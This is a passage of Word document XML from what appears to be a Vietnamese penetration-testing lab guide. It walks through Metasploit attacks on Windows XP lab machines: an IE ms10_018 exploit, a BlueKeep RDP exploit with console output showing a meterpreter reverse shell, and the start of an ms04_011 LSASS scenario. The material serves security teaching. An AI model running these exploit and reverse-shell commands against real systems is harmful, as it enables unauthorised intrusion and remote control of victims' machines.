      </w:r>
    </w:p>
    <w:p w14:paraId="48220794" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="00C0074E" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C0074E">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C8994ED" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="00C0074E" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C0074E">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>meterpreter &gt; execute -f cmd.exe -c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="252331F9" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="00C0074E" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C0074E">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>Process 1264 created.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5240EA2F" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="00C0074E" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C0074E">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>Channel 1 created.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F64E6EA" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="00C0074E" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C0074E">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>meterpreter &gt; interact 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CFB70AD" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="00C0074E" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C0074E">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>Interacting with channel 1...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="551E9C99" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="00C0074E" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C0074E">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="126A8E40" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="00C0074E" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0E33AEE1">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>C:\Documents and Settings\11\Desktop&gt; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CDFD99C" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3DF6C920" wp14:editId="3F8E9316">
            <wp:extent cx="5943600" cy="2390775"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="777386058" name="Picture 7773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52ABFD87" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>NOTE các lệnh chính</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B2A054D" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="446FC441">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>use windows/browser/ms10_018_ie_behaviors</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="061A2BF9" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="446FC441">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>set payload windows/meterpreter/reverse_tcp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3515B07F" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="446FC441">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>set LHOST 192.168.1.10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C20C517" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="446FC441">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>set LPORT 4040</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3035CBBD" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="446FC441">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>set URIPATH /test</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AD5D6F9" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="446FC441">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>set RHOSTS 192.168.1.110</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18A4C29C" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="446FC441">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03CA9E56" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="15" w:name="_Toc145594628"/>
      <w:r>
        <w:t>Tấn công Windows XP: CVE-2019-0708_bluekeep</w:t>
      </w:r>
      <w:bookmarkEnd w:id="15"/>
      <w:r>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F28FD8C" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtNoiDung"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">BlueKeep (CVE-2019-0708) là một lỗ hổng thực thi mã từ xa trong dịch vụ kết nối máy tính từ xa của Windows (Windows Remote Desktop Services). </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32938F18" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtNoiDung"/>
      </w:pPr>
      <w:r>
        <w:t>Tin tặc có thể sử dụng lỗ hổngg này để phát tán mã độc đào tiền ảo, trojan ngân hàng hoặc các loại mã độc khác, mà không cần sự tương tác của người dùng.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61E55E23" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtNoiDung"/>
      </w:pPr>
      <w:r>
        <w:t>Các HĐH bị ảnh hưởng: Windows 2003, Windows XP, Windows 7, Windows Server 2008, Windows Server 2008 R2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37595D6D" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="009B135C" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtNoiDung"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Kịch bản: </w:t>
      </w:r>
      <w:r w:rsidRPr="009B135C">
        <w:t xml:space="preserve">Máy Kali linux có </w:t>
      </w:r>
      <w:r>
        <w:t>địa chỉ IP 192</w:t>
      </w:r>
      <w:r w:rsidRPr="009B135C">
        <w:t xml:space="preserve">.168.1.10 (LHOST) sẽ tấn công </w:t>
      </w:r>
      <w:r w:rsidRPr="009B135C">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>c</w:t>
      </w:r>
      <w:r w:rsidRPr="009B135C">
        <w:t xml:space="preserve">ác máy Win </w:t>
      </w:r>
      <w:r>
        <w:t>XP</w:t>
      </w:r>
      <w:r w:rsidRPr="009B135C">
        <w:t xml:space="preserve"> có </w:t>
      </w:r>
      <w:r>
        <w:t>địa chỉ IP RHOSTS = 192</w:t>
      </w:r>
      <w:r w:rsidRPr="009B135C">
        <w:t>.168.1.1</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="009B135C">
        <w:t>0, 192.168.1.1</w:t>
      </w:r>
      <w:r>
        <w:t>11</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A61E9F9" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="009B135C" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="16" w:name="_Toc145594629"/>
      <w:r>
        <w:t>Thực hành</w:t>
      </w:r>
      <w:bookmarkEnd w:id="16"/>
    </w:p>
    <w:p w14:paraId="1959EB52" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtNoiDung"/>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>// Nếu đã chạy msf6 thì không cần chạy lại lệnh sudo msfconsole</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29A577FD" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
      </w:pPr>
      <w:r>
        <w:t>user@vmkali:~$ cd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BF8FE86" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
      </w:pPr>
      <w:r>
        <w:t>user@vmkali:~$ sudo msfconsole</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A493DD0" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="56D513F3" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
      </w:pPr>
      <w:r>
        <w:t>msf6 &gt; back</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="476B44BE" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="009B135C" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
      </w:pPr>
      <w:r>
        <w:t>msf6 &gt; ping 192.168.1.110</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79390356" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
      </w:pPr>
      <w:r>
        <w:t>use auxiliary/scanner/rdp/cve_2019_0708_bluekeep</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B42040A" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
      </w:pPr>
      <w:r>
        <w:t>show info</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EA1A89B" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="009B135C" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
      </w:pPr>
      <w:r>
        <w:t>set PAYLOAD windows/meterpreter/reverse_tcp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ACE2C42" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="009B135C" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
      </w:pPr>
      <w:r>
        <w:t>set LHOST 192.168.1.10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4284B3AC" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
      </w:pPr>
      <w:r>
        <w:t>set RHOSTS 192.168.1.110</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77EDA333" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
      </w:pPr>
      <w:r>
        <w:t>set target 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="729AD3EF" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
      </w:pPr>
      <w:r w:rsidRPr="009B135C">
        <w:t>exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38C17422" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7090FD03" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="00BB0A96" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB0A96">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>[*] Started reverse TCP handler on 192.168.1.10:4444</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="054752EE" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="00BB0A96" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB0A96">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>[*] 192.168.1.110:3389 - Running automatic check ("set AutoCheck false" to disable)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C452B3C" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="00BB0A96" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB0A96">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>[*] 192.168.1.110:3389 - Using auxiliary/scanner/rdp/cve_2019_0708_bluekeep as check</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24986E2C" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="00BB0A96" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB0A96">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>[*] 192.168.1.110:3389    - Detected RDP on 192.168.1.110:3389    (Windows version: N/A) (Requires NLA: No)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06C74B81" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="00BB0A96" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB0A96">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>[+] 192.168.1.110:3389    - The target is vulnerable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26A84C36" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="00BB0A96" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB0A96">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>[*] 192.168.1.110:3389    - Scanned 1 of 1 hosts (100% complete)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21807DE0" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="00BB0A96" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB0A96">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>[+] 192.168.1.110:3389 - The target is vulnerable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5969AE13" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="00BB0A96" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB0A96">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>[*] Sending stage (200774 bytes) to 192.168.1.110</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4647F57B" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="00BB0A96" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB0A96">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>[-] 192.168.1.110:3389 - Exploit failed: Msf::Exploit::Remote::RDP::RdpCommunicationError Msf::Exploit::Remote::RDP::        RdpCommunicationError</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51A13CB6" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="00BB0A96" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB0A96">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>[*] Exploit completed, but no session was created.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31A2E178" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB0A96">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>msf6 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) &gt; [*] Meterpreter session 1 opened (192.168.1.10:4444 -&gt; 192.168        .1.110:4326) at 2023-09-12 19:27:26 -0400</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50B079C8" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="17" w:name="_Toc145594630"/>
      <w:r>
        <w:t>Note</w:t>
      </w:r>
      <w:bookmarkEnd w:id="17"/>
    </w:p>
    <w:p w14:paraId="1D3CC88C" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
      </w:pPr>
      <w:r>
        <w:t>use windows/rdp/cve_2019_0708_bluekeep_rce </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FE66300" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
      </w:pPr>
      <w:r>
        <w:t>set PAYLOAD windows/meterpreter/reverse_tcp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0470BD10" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
      </w:pPr>
      <w:r>
        <w:t>set groomsize 50</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7411BBEB" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
      </w:pPr>
      <w:r>
        <w:t>set LHOST 192.168.1.10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67630D8C" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
      </w:pPr>
      <w:r>
        <w:t>set target 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E0B9258" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
      </w:pPr>
      <w:r>
        <w:t>set RHOSTS 192.168.1.110</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CFA15AD" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
      </w:pPr>
      <w:r>
        <w:t>exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="211E9AA4" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="0041641A" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="18" w:name="_Toc20808951"/>
      <w:bookmarkStart w:id="19" w:name="_Toc65834499"/>
      <w:bookmarkStart w:id="20" w:name="_Toc572123550"/>
      <w:bookmarkStart w:id="21" w:name="_Toc145594631"/>
      <w:r w:rsidRPr="3CE16CD3">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>Tấn công Windows XP</w:t>
      </w:r>
      <w:bookmarkEnd w:id="18"/>
      <w:bookmarkEnd w:id="19"/>
      <w:bookmarkEnd w:id="20"/>
      <w:r w:rsidRPr="3CE16CD3">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>:  ms04_011_lsass</w:t>
      </w:r>
      <w:bookmarkEnd w:id="21"/>
    </w:p>
    <w:p w14:paraId="2E1F44BE" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="0041641A" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="22" w:name="_Toc20808952"/>
      <w:bookmarkStart w:id="23" w:name="_Toc840339183"/>
      <w:bookmarkStart w:id="24" w:name="_Toc145594632"/>
      <w:r w:rsidRPr="3CE16CD3">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>Kịch bản</w:t>
      </w:r>
      <w:bookmarkEnd w:id="22"/>
      <w:bookmarkEnd w:id="23"/>
      <w:bookmarkEnd w:id="24"/>
    </w:p>
    <w:p w14:paraId="009D0B96" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="0041641A" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="7C6BFC6E">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>Máy Kali linux wandertour.ddns.net có Địa chỉ IP 192</w:t>
      </w:r>
      <w:r w:rsidRPr="7C6BFC6E">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>.168.1.10</w:t>
      </w:r>
      <w:r w:rsidRPr="7C6BFC6E">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> (LHOST) sẽ tấn công máy Win XP có Địa chỉ IP 192</w:t>
      </w:r>
      <w:r w:rsidRPr="7C6BFC6E">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>.168.1.110, 192.168.1.111</w:t>
      </w:r>
      <w:r w:rsidRPr="7C6BFC6E">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> (RHOST) dựa trên lổ hổng Lsass_ms04_011.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23D235D0" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="0041641A" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0041641A">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>Đây là lỗi tràn stack trong dịch vụ LSA (Local Security Authority). Lsass.exe là một process của hệ thống Microsoft Windows, chịu trách nhiệm về chứng thực local security, quản lý Active Directory và các chính sách login. Lsass kiểm soát việc chứng thực của cả client và server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52672881" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="0041641A" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="25" w:name="_Toc969408580"/>
